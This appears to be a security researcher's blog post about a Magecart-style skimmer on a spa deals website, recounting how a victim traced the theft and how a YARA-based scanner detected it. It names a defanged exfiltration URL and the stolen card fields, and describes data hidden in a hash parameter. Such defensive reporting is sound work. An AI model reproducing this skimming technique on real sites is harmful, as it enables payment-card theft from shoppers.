Recently, cyber attacks carried out by the Magecart group, which has become the nightmare of companies ranging from e-commerce companies (such as Newegg) to airlines (such as British Airways), to ticketing companies (such as Ticketmaster and Biletix) and media companies (such as ABS-CBN), continue to affect our country and our citizens. These attacks resulted in not only reputational damage but also high penalties due to laws and regulations such as GDPR and KVKK, as was the case with British Airways.
If I move on to my story, in June 2019, Tarık Uygun (@uyguntt) contacted me via direct message on Twitter, he said he had received a warning message that suspicious transactions were made using his credit card from Akbank. (Cheers to Akbank Fraud Risk Management Team. :) ) After he remembered that he had last used the card to make a purchase from a website that offers spa and massage deals, he found out through some research that when credit card information is entered, the information is hidden in the hash parameter and sent to https://kinitrofitness[.]com/wp-includes/class-wp-customize-settings.php. He decided to share this with me.
After looking a bit further, I clearly understood that this code was stealing the customer’s credit card information (Number, Holder, HolderFirstName, HolderLastName, Date, Month, Year, CVV, Gate, Data, Sent, SaveParam). When I did a quick search on Google, I also found that it was similar to the code used in the hack of 962 sites using the Magento e-commerce platform that occurred in July.”
As an example, when I ran the RedScanner tool on the target website by using the command “scrapy runspider –nolog RedScanner.py -a “urls=xyz[.]com”“, I found that it successfully detected the harmful code injected into the website using the existing Yara rules. Do not forget that you can also add your own special rules to the YARA rules used by the RedScanner tool, which will help to increase the detection rate.
Note: I thank Zero Xyele, a twitter user who persisted on my case for months, for pushing me to write this article.